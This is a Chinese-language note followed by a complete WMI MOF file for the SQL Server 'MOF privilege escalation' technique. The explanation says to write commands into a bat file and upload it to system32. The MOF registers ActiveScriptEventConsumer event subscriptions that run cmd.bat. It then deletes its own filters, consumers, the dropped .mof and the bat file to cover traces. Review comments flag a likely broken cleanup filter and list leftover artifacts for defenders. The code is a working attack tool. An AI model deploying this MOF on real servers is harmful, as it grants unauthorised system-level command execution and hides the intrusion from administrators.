这个 SQL 提权 MOF 只能运行 system 目录（system32）下的文件，不能自定义路径：脚本里的 `s.Run("cmd.bat")` 和清理脚本里的 `wbem\mof\good\hBsBa.mof` 用的都是不带路径的文件名，它们的解析位置取决于运行脚本的 WMI 宿主进程的当前目录，这也是原帖要求放到 system32 的原因。
因此需要先把要执行的命令写入 bat 文件，上传到 system32 目录，然后再触发执行。
这个 SQL 提权 MOF 只能运行 system 目录（system32）下的文件，不能自定义路径。
需要把要执行的命令写入 bat 文件，上传到 system32 目录，然后再执行。
// WMI permanent event subscription compiled into root\cimv2.
// Two filter -> consumer pairs are registered:
//   1. "instfilt" -> "ASEC"    : fires when an instance of MyClass547 is created
//                                (the last statement of this file), runs cmd.bat,
//                                then best-effort removes the marker class, the
//                                filter and the consumer itself.
//   2. "qndfilt"  -> "qndASEC" : meant to fire when a Win32_Process named
//                                "cmd.bat" disappears, then delete the dropped
//                                .mof, cmd.bat, its own filter and itself.
// NOTE(review): every path used by the scripts ("cmd.bat",
// "wbem\mof\good\hBsBa.mof") is relative, so it is resolved against the working
// directory of the WMI host process that runs the script — presumably why the
// accompanying text insists on system32; confirm on the target.
// NOTE(review): the dropped file name "hBsBa.mof" is hard-coded in the cleanup
// script; a file dropped under any other name is never removed.
// For defenders: the literal names below (ASEC, qndASEC, instfilt, qndfilt,
// MyClass547, "ClassConsumer", and an ActiveScriptEventConsumer provider
// registration in root\cimv2) are the repository artifacts this file leaves.
#pragma namespace("\\\\.\\root\\cimv2")

// Marker class. Creating an instance of it (see the end of the file) is the
// event that starts the whole chain.
class MyClass547
{
  [key] string Name;
};

// Local declaration of the ActiveScriptEventConsumer class so that it, and the
// provider registered right below, are available in this namespace.
class ActiveScriptEventConsumer : __EventConsumer
{
  [key] string Name;
  [not_null] string ScriptingEngine;
  string ScriptFileName;
  [template] string ScriptText;
  uint32 KillTimeout;
};

// COM provider that implements ActiveScriptEventConsumer, registered here as an
// event-consumer provider for that class.
instance of __Win32Provider as $asecProvider
{
  Name = "ActiveScriptEventConsumer";
  CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
  PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
  Provider = $asecProvider;
  ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Trigger filter: any newly created MyClass547 instance.
instance of __EventFilter as $triggerFilter
{
  Name = "instfilt";
  Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
  QueryLanguage = "WQL";
};

// Cleanup filter: polls once per second for a Win32_Process named "cmd.bat"
// being deleted.
// NOTE(review): a .bat started through WScript.Shell.Run is hosted by cmd.exe,
// so the process name WMI reports is most likely "cmd.exe", not "cmd.bat". If
// so, this filter never matches, the cleanup consumer never runs, and the .mof,
// cmd.bat, "qndfilt" and "qndASEC" are left behind. Confirm before relying on it.
instance of __EventFilter as $cleanupFilter
{
  Name = "qndfilt";
  Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
  QueryLanguage = "WQL";
};

// Payload consumer: runs cmd.bat via WScript.Shell, then deletes the marker
// class, the trigger filter and itself. Each step sits in its own try/catch, so
// any failure is silent. The __FilterToConsumerBinding is not deleted
// explicitly here; whether WMI drops it automatically is not shown by this file.
instance of ActiveScriptEventConsumer as $runConsumer
{
  Name = "ASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Cleanup consumer: deletes the compiled .mof under wbem\mof\good, then cmd.bat,
// then its own filter and itself. The last three deletions share one try block,
// so if cmd.bat cannot be deleted the filter/consumer removal is skipped as well.
instance of ActiveScriptEventConsumer as $cleanupConsumer
{
  Name = "qndASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Bindings. Both must exist before the marker instance below is created.
instance of __FilterToConsumerBinding
{
  Consumer = $runConsumer;
  Filter = $triggerFilter;
};

instance of __FilterToConsumerBinding
{
  Consumer = $cleanupConsumer;
  Filter = $cleanupFilter;
};

// Must stay last: creating this instance is what fires "instfilt" -> "ASEC".
instance of MyClass547
{
  Name = "ClassConsumer";
};